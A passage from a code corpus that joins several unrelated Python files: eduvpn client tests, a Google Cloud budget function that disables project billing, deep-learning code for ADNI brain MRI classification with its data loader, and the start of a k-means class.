from time import sleep
from .utils import (
remove_existing_config, create_test_app,
skip_if_network_manager_not_supported,
)
from .state_utils import StateTestCaseMixin
PROFILE_NAME_1 = 'Test Profile A'
PROFILE_NAME_2 = 'Test Profile B'
class TestOAuthSession:
def refresh_token(self, token_url):
pass
def get(self, url):
return TestOAuthResponse()
class TestOAuthResponse:
status_code = 200
def json(self):
return dict(
profile_list={'data': [
dict(
profile_id='t1',
display_name=PROFILE_NAME_1,
two_factor=False,
default_gateway=True,
),
dict(
profile_id='t2',
display_name=PROFILE_NAME_2,
two_factor=False,
default_gateway=True,
),
]},
)
class FlowTests(StateTestCaseMixin, TestCase):
@skip_if_network_manager_not_supported
def test_first_start(self):
from eduvpn.interface import state as interface_state
from eduvpn import network as network_state
remove_existing_config()
app = create_test_app()
self.assertReachesInterfaceState(app, interface_state.ConfigurePredefinedServer)
self.assertIsNone(app.interface_state.results)
self.assertReachesNetworkState(app, network_state.UnconnectedState)
# search for a server called 'demo'
app.interface_transition('enter_search_query', 'demo')
self.assertReachesInterfaceState(app, interface_state.ConfigurePredefinedServer)
self.assertEqual(
list(map(str, app.interface_state.results)),
['Demo'],
)
server = app.interface_state.results[0]
# perform the oauth login
with patch('eduvpn.oauth2.run_challenge_in_background') as oauth_func:
with patch('webbrowser.open') as webbrowser_open:
url = 'test-url'
webserver = object()
callback = None
def oauth_challenge(token_endpoint, auth_endpoint, app_variant, cb):
nonlocal callback
callback = cb
return webserver, url
oauth_func.side_effect = oauth_challenge
app.interface_transition('connect_to_server', server)
self.assertReachesInterfaceState(app, interface_state.OAuthSetup)
self.assertIs(app.interface_state.oauth_web_server, webserver)
webbrowser_open.assert_called_once_with(url)
self.assertIsNotNone(callback)
oauth_session = TestOAuthSession()
callback(oauth_session)
self.assertReachesInterfaceState(app, interface_state.ChooseProfile)
self.assertEqual(
list(map(str, app.interface_state.profiles)),
[PROFILE_NAME_1, PROFILE_NAME_2],
)
```
#### File: python-eduvpn-client/tests/test_main.py
```python
from unittest import TestCase
from eduvpn.cli import parse_eduvpn
class TestMain(TestCase):
def test_parse_args(self):
with self.assertRaises(SystemExit):
parse_eduvpn(["test"])
```
#### File: python-eduvpn-client/tests/test_menu.py
```python
from argparse import Namespace
from unittest import TestCase, mock
from unittest.mock import patch, MagicMock
from tests.mock_config import mock_server, mock_org
from eduvpn.menu import menu, input_int, profile_choice, provider_choice, write_to_nm_choice
from eduvpn.menu import search, configure, interactive, match_term, fetch_servers_orgs
class TestMenu(TestCase):
def test_menu(self):
with mock.patch('builtins.input', lambda _: '0'):
menu(institutes=[{'display_name': 'test', 'base_url': 'no url', 'support_contact': '<EMAIL>'}], orgs=[], search_term="test")
def test_input_int(self):
with mock.patch('builtins.input', lambda _: '1'):
input_int(max_=3)
def test_profile_choice(self):
profiles = [{'profile_id': 'internet'}]
profile_choice(profiles=profiles)
def test_provider_choice(self):
base_uri = 'bla'
institutes = [{'display_name': 'test', 'base_url': base_uri, 'support_contact': '<EMAIL>'}]
with mock.patch('builtins.input', lambda _: '0'):
url, display_name, contact, secure_internet = provider_choice(institutes=institutes, orgs=[])
self.assertEqual(secure_internet, False)
self.assertEqual(base_uri, url)
def test_write_to_nm_choice(self):
with mock.patch('builtins.input', lambda _: '1'):
write_to_nm_choice()
@patch('eduvpn.menu.fetch_servers_orgs')
@patch('eduvpn.actions.fetch_token')
def test_configure(self, _: MagicMock, fetch_servers_orgs_: MagicMock):
fetch_servers_orgs_.return_value = [mock_server], [mock_org]
configure(Namespace(match='bogus'))
configure(Namespace(match=''))
def test_match_term(self):
match_term(servers=[], orgs=[], search_term="search")
@patch('eduvpn.menu.fetch_servers_orgs')
def test_search(self, fetch_servers_orgs_: MagicMock):
fetch_servers_orgs_.return_value = [mock_server], [mock_org]
search(Namespace(match='bogus'))
@patch('eduvpn.menu.list_servers')
@patch('eduvpn.menu.list_organisations')
def test_fetch_servers_orgs(self, list_organisations, list_servers):
fetch_servers_orgs()
def test_main_with_url(self):
args = MagicMock()
args.match = "https://test"
interactive(args)
``` |
{
"source": "14Ricardo/python-docs-samples",
"score": 3
} |
#### File: python-docs-samples/billing/main.py
```python
import base64
import json
import google.auth
from google.cloud import billing
PROJECT_ID = google.auth.default()[1]
cloud_billing_client = billing.CloudBillingClient()
def stop_billing(data: dict, context):
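    # The incoming Pub/Sub message is expected to be a Cloud Billing budget
    # notification; its JSON payload carries the costAmount and budgetAmount fields.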
pubsub_data = base64.b64decode(data["data"]).decode("utf-8")
pubsub_json = json.loads(pubsub_data)
cost_amount = pubsub_json["costAmount"]
budget_amount = pubsub_json["budgetAmount"]
if cost_amount <= budget_amount:
print(f"No action necessary. (Current cost: {cost_amount})")
return
project_name = cloud_billing_client.common_project_path(PROJECT_ID)
billing_enabled = _is_billing_enabled(project_name)
if billing_enabled:
_disable_billing_for_project(project_name)
else:
print("Billing already disabled")
def _is_billing_enabled(project_name: str) -> bool:
"""Determine whether billing is enabled for a project
Args:
project_name (str): Name of project to check if billing is enabled
Returns:
bool: Whether project has billing enabled or not
"""
request = billing.GetProjectBillingInfoRequest(name=project_name)
project_billing_info = cloud_billing_client.get_project_billing_info(request)
return project_billing_info.billing_enabled
def _disable_billing_for_project(project_name: str) -> None:
"""Disable billing for a project by removing its billing account
Args:
project_name (str): Name of project disable billing on
"""
request = billing.UpdateProjectBillingInfoRequest(
name=project_name,
project_billing_info=billing.ProjectBillingInfo(
billing_account_name="" # Disable billing
),
)
    project_billing_info = cloud_billing_client.update_project_billing_info(request)
    print(f"Billing disabled: {project_billing_info}")
``` |
{
"source": "14thibea/deep_learning_ADNI",
"score": 3
} |
#### File: deep_learning_ADNI/main/autoencoder_training.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from os import path
import os
import numpy as np
import pandas as pd
from copy import copy, deepcopy
class LargeAutoEncoder(nn.Module):
"""
Sparse Autoencoder for transfer learning
"""
def __init__(self):
super(LargeAutoEncoder, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, 150, 5)
self.decode = nn.ConvTranspose3d(150, 1, 5)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
out = F.relu(self.decode(h))
return out, h, d
class LargeConvolutionalNetwork(nn.Module):
"""
Classifier for binary classification task
"""
def __init__(self, n_classes=2):
super(LargeConvolutionalNetwork, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, 150, 5)
self.pool = nn.MaxPool3d(5, 5)
self.fc1 = nn.Linear(150 * 11 * 13 * 11, 800)
self.fc2 = nn.Linear(800, n_classes)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
h = self.pool(h)
h = h.view(-1, 150 * 11 * 13 * 11)
h = F.relu(self.fc1(h))
out = self.fc2(h)
return out
class AdaptativeAutoEncoder(nn.Module):
"""
Sparse Autoencoder for transfer learning
"""
def __init__(self, n_filters):
super(AdaptativeAutoEncoder, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, n_filters, 5)
self.decode = nn.ConvTranspose3d(n_filters, 1, 5)
def forward(self, x):
d = self.downsample(x)
h = F.relu(self.encode(d))
out = F.relu(self.decode(h))
return out, h, d
class AdaptativeConvolutionalNetwork(nn.Module):
"""
Classifier for binary classification task
"""
def __init__(self, n_filters, dropout=0, n_classes=2):
super(AdaptativeConvolutionalNetwork, self).__init__()
self.downsample = nn.MaxPool3d(2, 2)
self.encode = nn.Conv3d(1, n_filters, 5)
self.pool = nn.MaxPool3d(5, 5)
self.fc1 = nn.Linear(n_filters * 11 * 13 * 11, 800)
self.fc2 = nn.Linear(800, n_classes)
self.n_filters = n_filters
self.dropout = nn.Dropout(p=dropout)
def forward(self, x, train=False):
d = self.downsample(x)
h = F.relu(self.encode(d))
h = self.pool(h)
h = h.view(-1, self.n_filters * 11 * 13 * 11)
if train:
h = self.dropout(h)
h = F.relu(self.fc1(h))
out = self.fc2(h)
return out
def l1_penalty(var):
return torch.abs(var).sum()
def test_autoencoder(model, dataloader, criterion=nn.MSELoss(), gpu=False):
total_loss = 0
with torch.no_grad():
for sample in dataloader:
if gpu:
images, diagnoses = sample['image'].cuda(), sample['diagnosis'].cuda()
else:
images, diagnoses = sample['image'], sample['diagnosis']
outputs, hidden_layer, downsample = model(images)
loss = criterion(outputs, downsample)
total_loss += loss
print('Loss of the model: ' + str(total_loss))
return total_loss
def save_results(best_params, validloader, test_method, results_path, name, denomination='Accuracy', testloader=None,
                 gpu=False):
    if testloader is not None:
        len_test = len(testloader.dataset)
        acc_test = test_method(best_params['best_model'], testloader, gpu=gpu)
    else:
        len_test = 0
        acc_test = 0
    len_valid = len(validloader.dataset)
    acc_valid = test_method(best_params['best_model'], validloader, gpu=gpu)
    output_name = 'best_' + name + '.txt'
    text_file = open(path.join(results_path, output_name), 'w')
    text_file.write('Best fold: %i \n' % best_params['fold'])
    text_file.write('Best epoch: %i \n' % (best_params['best_epoch'] + 1))
    text_file.write('Time of training: %d s \n' % best_params['training_time'])
    if denomination == 'Accuracy':
        text_file.write(denomination + ' on validation set: %.2f %% \n' % acc_valid)
        if testloader is not None:
            text_file.write(denomination + ' on test set: %.2f %% \n' % acc_test)
    else:
        text_file.write(denomination + ' on validation set: %.3E \n' % (acc_valid / len_valid))
        if testloader is not None:
            text_file.write(denomination + ' on test set: %.3E \n' % (acc_test / len_test))
    text_file.close()
    if denomination == 'Accuracy':
        print(denomination + ' of the network on the %i validation images: %.2f %%' % (len_valid, acc_valid))
        print(denomination + ' of the network on the %i test images: %.2f %%' % (len_test, acc_test))
    else:
        print(denomination + ' of the network on the %i validation images: %.3E' % (len_valid, acc_valid))
        print(denomination + ' of the network on the %i test images: %.3E' % (len_test, acc_test))
    parameters_name = 'best_parameters_' + name + '.tar'
    torch.save(best_params['best_model'].state_dict(), path.join(results_path, parameters_name))
def load_state_dict(self, state_dict):
"""
Loads a pretrained layer in a Module instance
:param self: the Module instance
:param state_dict: The dictionary of pretrained parameters
"""
own_state = self.state_dict()
for name, param in state_dict.items():
if name in own_state:
# backwards compatibility for serialized parameters
param = param.data
own_state[name].copy_(param)
if __name__ == '__main__':
from data_loader import MriBrainDataset, ToTensor, GaussianSmoothing
from training_functions import CrossValidationSplit, cross_validation, test
import torch.optim as optim
from torch.utils.data import DataLoader
from time import time
import argparse
import torchvision
parser = argparse.ArgumentParser()
# Mandatory arguments
parser.add_argument("train_path", type=str,
help='path to your list of subjects for training')
parser.add_argument("results_path", type=str,
help="where the outputs are stored")
parser.add_argument("caps_path", type=str,
help="path to your caps folder")
# Network structure
parser.add_argument('-filters', '--n_filters', type=int, default=150,
help='number of filters used in the encoding convolutional layer')
parser.add_argument('--n_classes', type=int, default=2,
help='Number of classes in the dataset')
# Dataset management
parser.add_argument('--bids', action='store_true', default=False)
parser.add_argument('--sigma', type=float, default=0,
help='Size of the Gaussian smoothing kernel (preprocessing)')
# Training arguments
parser.add_argument("-e", "--epochs", type=int, default=2,
help="number of loops on the whole dataset")
    parser.add_argument('-lra', '--learning_rate_auto', type=float, default=1,
                        help='the learning rate of the optimizer of the sparse autoencoder ( * 0.00005)')
    parser.add_argument('-lrc', '--learning_rate_class', type=float, default=1,
                        help='the learning rate of the optimizer of the classifier ( * 0.00005)')
parser.add_argument("-l1", "--lambda1", type=float, default=1,
help="coefficient of the L1 regularization for the sparsity of the autoencoder")
parser.add_argument('-cv', '--cross_validation', type=int, default=10,
help='cross validation parameter')
parser.add_argument('--dropout', '-d', type=float, default=0.5,
help='Dropout rate before FC layers')
parser.add_argument('--batch_size', '-batch', type=int, default=4,
help="The size of the batches to train the network")
# Managing output
parser.add_argument("-n", "--name", type=str, default='network',
help="name given to the outputs and checkpoints of the parameters")
parser.add_argument("-save", "--save_interval", type=int, default=1,
help="the number of epochs done between the tests and saving")
# Managing device
parser.add_argument('--gpu', action='store_true', default=False,
help='Uses gpu instead of cpu if cuda is available')
parser.add_argument('--on_cluster', action='store_true', default=False,
help='to work on the cluster of the ICM')
args = parser.parse_args()
results_path = path.join(args.results_path, args.name)
if not path.exists(results_path):
os.makedirs(results_path)
if args.gpu and torch.cuda.is_available():
device = torch.device('cuda')
else:
device = torch.device("cpu")
# Autoencoder training
autoencoder = AdaptativeAutoEncoder(args.n_filters).to(device=device)
lr_autoencoder = 0.00005 * args.learning_rate_auto
lr_classifier = 0.00005 * args.learning_rate_class
batch_size = args.batch_size
train_prop = 0.85
val_prop = 0.15
tol = 1e-2
composed = torchvision.transforms.Compose([GaussianSmoothing(sigma=args.sigma), ToTensor(gpu=args.gpu)])
optimizer = optim.Adam(autoencoder.parameters(), lr=lr_autoencoder)
dataset = MriBrainDataset(args.train_path, args.caps_path, transform=composed, on_cluster=args.on_cluster)
cross_val = CrossValidationSplit(dataset, cv=train_prop, stratified=True, shuffle_diagnosis=True, val_prop=val_prop)
trainset, validset, testset = cross_val(dataset)
trainloader = DataLoader(trainset, batch_size=batch_size, shuffle=True, num_workers=4)
validloader = DataLoader(validset, batch_size=batch_size, shuffle=False, num_workers=4)
testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=4)
epoch = 0
loss_train = np.inf
loss_valid_min = np.inf
best_model = None
best_epoch = 0
t0 = time()
name = 'autoencoder_' + args.name
filename = path.join(results_path, name + '.tsv')
criterion = nn.MSELoss()
results_df = pd.DataFrame(columns=['epoch', 'training_time', 'acc_train', 'acc_validation'])
with open(filename, 'w') as f:
results_df.to_csv(f, index=False, sep='\t')
flag = True
while flag:
prev_loss_train = loss_train
running_loss = 0.0
for i, data in enumerate(trainloader, 0):
if args.gpu:
inputs = data['image'].cuda()
else:
inputs = data['image']
outputs, hidden_layer, downsample = autoencoder(inputs)
MSEloss = criterion(outputs, downsample)
l1_regularization = args.lambda1 * l1_penalty(hidden_layer)
loss = MSEloss + l1_regularization
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
if i % 10 == 9: # print every 10 mini-batches
print('[%d, %d] loss: %f' %
(epoch + 1, i + 1, running_loss))
running_loss = 0.0
print('Finished Epoch: %d' % (epoch + 1))
if epoch % args.save_interval == args.save_interval - 1:
training_time = time() - t0
loss_train = test_autoencoder(autoencoder, trainloader, gpu=args.gpu)
loss_valid = test_autoencoder(autoencoder, validloader, gpu=args.gpu)
row = np.array([epoch + 1, training_time, loss_train, loss_valid]).reshape(1, -1)
row_df = pd.DataFrame(row, columns=['epoch', 'training_time', 'loss_train', 'loss_validation'])
with open(filename, 'a') as f:
row_df.to_csv(f, header=False, index=False, sep='\t')
if loss_valid < loss_valid_min:
loss_valid_min = copy(loss_valid)
best_epoch = copy(epoch)
best_model = deepcopy(autoencoder)
epoch += 1
print('Convergence criterion: ', torch.abs((prev_loss_train - loss_train)/loss_train))
flag = epoch < args.epochs and torch.abs(prev_loss_train - loss_train)/loss_train > tol
training_time = time() - t0
best_params = {'training_time': time() - t0,
'best_epoch': best_epoch,
'best_model': best_model,
'loss_valid_min': loss_valid_min,
'fold': -1}
save_results(best_params, validloader, test_autoencoder, results_path, name, testloader=testloader,
denomination='Loss', gpu=args.gpu)
classifier = AdaptativeConvolutionalNetwork(args.n_filters, args.dropout,
n_classes=args.n_classes).to(device=device)
# Load pretrained layer in classifier
load_state_dict(classifier, best_model.state_dict())
classifier.encode.bias.requires_grad = False
classifier.encode.weight.requires_grad = False
name = 'classifier_' + args.name
best_params = cross_validation(classifier, trainset, batch_size=batch_size, folds=args.cross_validation,
epochs=args.epochs, results_path=results_path, model_name=name,
save_interval=args.save_interval, gpu=args.gpu, lr=lr_classifier,
tol=1.0)
```
#### File: deep_learning_ADNI/main/data_loader.py
```python
from torch.utils.data import Dataset
import torch
import pandas as pd
from os import path
from copy import copy
import nibabel as nib
import numpy as np
from nilearn import plotting
from skimage.transform import resize
from scipy.ndimage.filters import gaussian_filter
bids_cohort_dict = {'ADNI': 'ADNI_BIDS_T1_PET',
'AIBL': 'AIBL_BIDS',
'OASIS': 'OASIS_BIDS_new'}
minimum_size = np.array([145, 230, 200])
maximum_size = np.array([235, 280, 280])
def crop(image):
size = np.array(np.shape(image))
crop_idx = np.rint((size - minimum_size) / 2).astype(int)
first_crop = copy(crop_idx)
second_crop = copy(crop_idx)
for i in range(3):
if minimum_size[i] + first_crop[i] * 2 != size[i]:
first_crop[i] -= 1
cropped_image = image[first_crop[0]:size[0]-second_crop[0],
first_crop[1]:size[1]-second_crop[1],
first_crop[2]:size[2]-second_crop[2]]
return cropped_image
def pad(image):
size = np.array(np.shape(image))
pad_idx = np.rint((maximum_size - size) / 2).astype(int)
first_pad = copy(pad_idx)
second_pad = copy(pad_idx)
for i in range(3):
if size[i] + first_pad[i] * 2 != maximum_size[i]:
first_pad[i] -= 1
padded_image = np.pad(image, np.array([first_pad, second_pad]).T, mode='constant')
return padded_image
def transform_bids_image(reading_img, transform='crop'):
"""
    Transformation of a BIDS image: transposition of coordinates, flipping of axes, rescaling of voxel size and
    rescaling of global size.
"""
header = reading_img.header
img = reading_img.get_data()
if len(np.shape(img)) == 4:
img = img[:, :, :, 0]
# Transposition
loc_x = np.argmax(np.abs(header['srow_x'][:-1:]))
loc_y = np.argmax(np.abs(header['srow_y'][:-1:]))
loc_z = np.argmax(np.abs(header['srow_z'][:-1:]))
transposed_image = img.transpose(loc_x, loc_y, loc_z)
# Directions
flips = [False, False, False]
flips[0] = (np.sign(header['srow_x'][loc_x]) == -1)
flips[1] = (np.sign(header['srow_y'][loc_y]) == -1)
flips[2] = (np.sign(header['srow_z'][loc_z]) == -1)
for coord, flip in enumerate(flips):
if flip:
transposed_image = np.flip(transposed_image, coord)
# Resizing voxels
coeff_x = np.max(np.abs(header['srow_x'][:-1:]))
coeff_y = np.max(np.abs(header['srow_y'][:-1:]))
coeff_z = np.max(np.abs(header['srow_z'][:-1:]))
transposed_size = np.shape(transposed_image)
transposed_image = transposed_image / np.max(transposed_image)
new_size = np.rint(np.array(transposed_size) * np.array([coeff_x, coeff_y, coeff_z]))
resized_image = resize(transposed_image, new_size, mode='constant')
# Adaptation before rescale
if transform == 'crop':
image = crop(resized_image)
elif transform == 'pad':
image = pad(resized_image)
else:
raise ValueError("The transformations allowed are cropping (transform='crop') or padding (transform='pad')")
# Final rescale
rescale_image = resize(image, (121, 145, 121), mode='constant')
return rescale_image
class BidsMriBrainDataset(Dataset):
"""Dataset of subjects of CLINICA (baseline only) from BIDS"""
def __init__(self, subjects_df_path, caps_dir, transform=None, classes=2, rescale='crop'):
"""
:param subjects_df_path: Path to a TSV file with the list of the subjects in the dataset
:param caps_dir: The BIDS directory where the images are stored
:param transform: Optional transform to be applied to a sample
:param classes: Number of classes to consider for classification
            if 2 --> ['CN', 'AD']
            if 3 --> ['CN', 'MCI', 'AD']
            if 4 --> ['CN', 'sMCI', 'pMCI', 'AD']
"""
if type(subjects_df_path) is str:
self.subjects_df = pd.read_csv(subjects_df_path, sep='\t')
elif type(subjects_df_path) is pd.DataFrame:
self.subjects_df = subjects_df_path
else:
raise ValueError('Please enter a path or a Dataframe as first argument')
self.caps_dir = caps_dir
self.transform = transform
if classes == 2:
self.diagnosis_code = {'CN': 0, 'AD': 1}
elif classes == 3:
self.diagnosis_code = {'CN': 0, 'MCI': 1, 'AD': 2}
elif classes == 4:
self.diagnosis_code = {'CN': 0, 'sMCI': 1, 'pMCI': 2, 'AD': 3}
self.extension = '_ses-M00_T1w.nii.gz'
self.folder_path = path.join('ses-M00', 'anat')
self.rescale = rescale
def __len__(self):
return len(self.subjects_df)
def __getitem__(self, subj_idx):
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
data_path = path.join(self.caps_dir, bids_cohort_dict[cohort])
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = transform_bids_image(reading_image, self.rescale)
# Convert diagnosis to int
if type(diagnosis) is str:
diagnosis = self.diagnosis_code[diagnosis]
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if self.transform:
sample = self.transform(sample)
return sample
def subjects_list(self):
return self.subjects_df['participant_id'].values.tolist()
def diagnosis_list(self):
diagnosis_list = self.subjects_df['diagnosis'].values.tolist()
diagnosis_code = [self.diagnosis_code[diagnosis] for diagnosis in diagnosis_list]
return diagnosis_code
def imsave(self, subj_idx, output_path, cut_coords=None, use_transforms=True):
"""
Creates a png file with frontal, axial and lateral cuts of the brain.
:param subj_idx: The index of the subject in the dataset
:param output_path: The path to the created image
:param cut_coords: Coordinates to define the cuts (optional)
:return: None
"""
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
data_path = path.join(self.caps_dir, bids_cohort_dict[cohort])
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = transform_bids_image(reading_image, self.rescale)
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if use_transforms and self.transform is not None:
sample = self.transform(sample)
final_image = nib.Nifti1Image(sample['image'], affine=np.eye(4))
anat = plotting.plot_anat(final_image, title='subject ' + subj_name, cut_coords=cut_coords)
anat.savefig(output_path)
anat.close()
class MriBrainDataset(Dataset):
"""Dataset of subjects of CLINICA (baseline only) from CAPS"""
def __init__(self, subjects_df_path, caps_dir, transform=None, classes=2, preprocessing='dartel', on_cluster=False):
"""
:param subjects_df_path: Path to a TSV file with the list of the subjects in the dataset
:param caps_dir: The CAPS directory where the images are stored
:param transform: Optional transform to be applied to a sample
:param classes: Number of classes to consider for classification
if 2 --> ['CN', 'AD']
if 3 --> ['CN', 'MCI', 'AD']
        :param preprocessing: preprocessing pipeline used, either 'dartel' or 'mni'
"""
if type(subjects_df_path) is str:
self.subjects_df = pd.read_csv(subjects_df_path, sep='\t')
elif type(subjects_df_path) is pd.DataFrame:
self.subjects_df = subjects_df_path
else:
raise ValueError('Please enter a path or a Dataframe as first argument')
self.caps_dir = caps_dir
self.transform = transform
self.on_cluster = on_cluster
if classes == 2:
self.diagnosis_code = {'CN': 0, 'AD': 1}
elif classes == 3:
self.diagnosis_code = {'CN': 0, 'MCI': 1, 'AD': 2}
if preprocessing == 'mni':
self.extension = '_ses-M00_T1w_segm-graymatter_space-Ixi549Space_modulated-off_probability.nii.gz'
self.folder_path = path.join('ses-M00', 't1', 'spm', 'segmentation', 'normalized_space')
elif preprocessing == 'dartel':
self.extension = '_ses-M00_T1w_segm-graymatter_dartelinput.nii.gz'
self.folder_path = path.join('ses-M00', 't1', 'spm', 'segmentation', 'dartel_input')
        else:
            raise ValueError('The directory is a CAPS folder and the preprocessing value entered is not valid. '
                             'Valid values are ["dartel", "mni"]')
def __len__(self):
return len(self.subjects_df)
def __getitem__(self, subj_idx):
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
if self.on_cluster:
caps_name = 'CAPS_' + cohort + '_T1_SPM'
else:
caps_name = 'CAPS_' + cohort
data_path = path.join(self.caps_dir, caps_name, 'subjects')
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = reading_image.get_data()
# Convert diagnosis to int
if type(diagnosis) is str:
diagnosis = self.diagnosis_code[diagnosis]
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if self.transform:
sample = self.transform(sample)
return sample
def subjects_list(self):
return self.subjects_df['participant_id'].values.tolist()
def diagnosis_list(self):
diagnosis_list = self.subjects_df['diagnosis'].values.tolist()
diagnosis_code = [self.diagnosis_code[diagnosis] for diagnosis in diagnosis_list]
return diagnosis_code
def imsave(self, subj_idx, output_path, cut_coords=None, use_transforms=True):
"""
Creates a png file with frontal, axial and lateral cuts of the brain.
:param subj_idx: The index of the subject in the dataset
:param output_path: The path to the created image
:param cut_coords: Coordinates to define the cuts (optional)
:return: None
"""
subj_name = self.subjects_df.loc[subj_idx, 'participant_id']
diagnosis = self.subjects_df.loc[subj_idx, 'diagnosis']
cohort = self.subjects_df.loc[subj_idx, 'cohort']
img_name = subj_name + self.extension
if self.on_cluster:
caps_name = 'CAPS_' + cohort + '_T1_SPM'
else:
caps_name = 'CAPS_' + cohort
data_path = path.join(self.caps_dir, caps_name, 'subjects')
img_path = path.join(data_path, subj_name, self.folder_path, img_name)
reading_image = nib.load(img_path)
image = reading_image.get_data()
sample = {'image': image, 'diagnosis': diagnosis, 'name': subj_name}
if use_transforms and self.transform is not None:
sample = self.transform(sample)
final_image = nib.Nifti1Image(sample['image'], affine=np.eye(4))
anat = plotting.plot_anat(final_image, title='subject ' + subj_name, cut_coords=cut_coords)
anat.savefig(output_path)
anat.close()
class GaussianSmoothing(object):
def __init__(self, sigma):
self.sigma = sigma
def __call__(self, sample):
image = sample['image']
np.nan_to_num(image, copy=False)
smoothed_image = gaussian_filter(image, sigma=self.sigma)
sample['image'] = smoothed_image
return sample
class ToTensor(object):
"""Convert image type to Tensor and diagnosis to diagnosis code"""
def __init__(self, gpu=False):
self.gpu = gpu
def __call__(self, sample):
image, diagnosis, name = sample['image'], sample['diagnosis'], sample['name']
np.nan_to_num(image, copy=False)
if self.gpu:
return {'image': torch.from_numpy(image[np.newaxis, :]).float(),
'diagnosis': torch.from_numpy(np.array(diagnosis)),
'name': name}
else:
return {'image': torch.from_numpy(image[np.newaxis, :]).float(),
'diagnosis': diagnosis,
'name': name}
class MeanNormalization(object):
"""Normalize images using a .nii file with the mean values of all the subjets"""
def __init__(self, mean_path):
assert path.isfile(mean_path)
self.mean_path = mean_path
def __call__(self, sample):
reading_mean = nib.load(self.mean_path)
mean_img = reading_mean.get_data()
return {'image': sample['image'] - mean_img,
'diagnosis': sample['diagnosis'],
'name': sample['name']}
class LeftHippocampusSegmentation(object):
def __init__(self):
self.x_min = 68
self.x_max = 88
self.y_min = 60
self.y_max = 80
self.z_min = 28
self.z_max = 48
def __call__(self, sample):
image, diagnosis = sample['image'], sample['diagnosis']
hippocampus = image[self.x_min:self.x_max:, self.y_min:self.y_max:, self.z_min:self.z_max:]
return {'image': hippocampus,
'diagnosis': sample['diagnosis'],
'name': sample['name']}
if __name__ == '__main__':
import torchvision
subjects_tsv_path = '/Volumes/aramis-projects/elina.thibeausutre/data/2-classes/dataset-ADNI+AIBL+corrOASIS.tsv'
caps_path = '/Volumes/aramis-projects/CLINICA/CLINICA_datasets/BIDS'
sigma = 0
composed = torchvision.transforms.Compose([GaussianSmoothing(sigma),
# ToTensor()
])
dataset = BidsMriBrainDataset(subjects_tsv_path, caps_path, transform=composed)
# lengths = []
# for i in range(len(dataset)):
# image = dataset[i]['image']
# lengths.append(np.shape(image))
# if i % 100 == 99:
# print(i + 1, '/', len(dataset))
#
# lengths = np.unique(np.array(lengths), axis=0)
# print(lengths)
# length_df = pd.DataFrame(lengths)
# length_df.to_csv('/Users/elina.thibeausutre/Documents/data/lengths_BIDS.tsv', sep='\t')
idx = 0
dataset.imsave(idx, '/Users/elina.thibeausutre/Desktop/smooth' + str(sigma) + '+cropped+doubleresized+normalized_figure' + str(idx))
``` |
{
"source": "14thibea/Stage_ENS",
"score": 3
} |
#### File: megamix/batch/kmeans.py
```python
import numpy as np
import h5py
from .base import BaseMixture, _check_saving
def dist_matrix(points,means):
XX = np.einsum('ij,ij->i', points, points)[:, np.newaxis] # Size (n_points,1)
squared_matrix = np.dot(points,means.T) # Size (n_points,n_components)
YY = np.einsum('ij,ij->i', means, means)[np.newaxis, :] # Size (1,n_components)
squared_matrix *= -2
squared_matrix += XX
squared_matrix += YY
np.maximum(squared_matrix, 0, out=squared_matrix)
return np.sqrt(squared_matrix, out=squared_matrix)
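# Added illustration (not part of the original file): dist_matrix relies on the expansion
# ||x - m||^2 = ||x||^2 - 2 x.m + ||m||^2, clipping small negatives from rounding before the
# square root. A brute-force reference it should match up to floating-point error:
#   pts, mus = np.random.randn(6, 3), np.random.randn(2, 3)
#   ref = np.array([[np.linalg.norm(p - m) for m in mus] for p in pts])
#   np.allclose(dist_matrix(pts, mus), ref)  # expected to be True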
class Kmeans(BaseMixture):
"""
Kmeans model.
Parameters
----------
n_components : int, defaults to 1.
Number of clusters used.
init : str, defaults to 'plus'.
Method used in order to perform the initialization,
must be in ['random', 'plus', 'AF_KMC'].
Attributes
----------
name : str
The name of the method : 'Kmeans'
means : array of floats (n_components,dim)
Contains the computed means of the model.
log_weights : array of floats (n_components,)
Contains the logarithm of the mixing coefficient of each cluster.
iter : int
The number of iterations computed with the method fit()
_is_initialized : bool
Ensures that the model has been initialized before using other
methods such as distortion() or predict_assignements().
Raises
------
ValueError : if the parameters are inconsistent, for example if the cluster number is negative, init_type is not in ['resp','mcw']...
References
----------
'Fast and Provably Good Seedings for k-Means', <NAME>, <NAME>, <NAME>, A.Krause
'Lloyd's algorithm <https://en.wikipedia.org/wiki/Lloyd's_algorithm>'_
'The remarkable k-means++ <https://normaldeviate.wordpress.com/2012/09/30/the-remarkable-k-means/>'_
"""
def __init__(self,n_components=1,init="plus",n_jobs=1):
super(Kmeans, self).__init__()
self.name = 'Kmeans'
self.n_components = n_components
self.init = init
self.n_jobs = n_jobs
self._is_initialized = False
self.iter = 0
self._check_parameters()
def _check_parameters(self):
if self.n_components < 1:
raise ValueError("The number of components cannot be less than 1")
else:
self.n_components = int(self.n_components)
if self.init not in ['random', 'plus', 'kmeans', 'AF_KMC']:
raise ValueError("Invalid value for 'init': %s "
"'init' should be in "
"['random', 'plus', 'kmeans', 'AF_KMC']"
